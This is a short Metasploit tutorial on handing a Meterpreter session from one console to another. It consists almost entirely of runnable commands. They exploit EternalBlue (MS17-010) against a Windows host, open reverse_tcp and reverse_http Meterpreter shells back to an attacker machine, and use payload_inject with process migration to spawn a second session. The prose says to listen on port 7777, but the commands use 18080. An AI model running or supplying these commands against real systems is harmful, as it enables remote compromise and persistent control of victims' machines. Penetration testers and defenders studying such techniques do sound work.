Passing a session from one MSF to another MSF (meterpreter to another meterpreter), Metasploit
First, obtain a shell via ms17_010 (EternalBlue). 192.168.50.146 is the victim machine and 192.168.50.130 is the Kali IP:
set autorunscript post/windows/manage/migrate name=services.exe
set payload windows/x64/meterpreter/reverse_tcp
set lport 5577
set lhost 192.168.50.130
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.50.146
set rport 445
exploit -j -z
Next, in the other msf, set up a listener on 3333:
handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp;
Then, in the first msfconsole (the one holding the meterpreter session obtained above):
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 3333
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run
After this, the session obtained with ms17_010 can be exited.
The above uses reverse_tcp; reverse_http works the same way:
In the other msf, set up a listener on 7777:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set ExitOnSession false
set SessionExpirationTimeout 0
set SessionCommunicationTimeout 0
exploit -j -z
Then spawn the new session from the old one:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run
After run, it takes roughly 15-20 seconds for the new session to be fully established.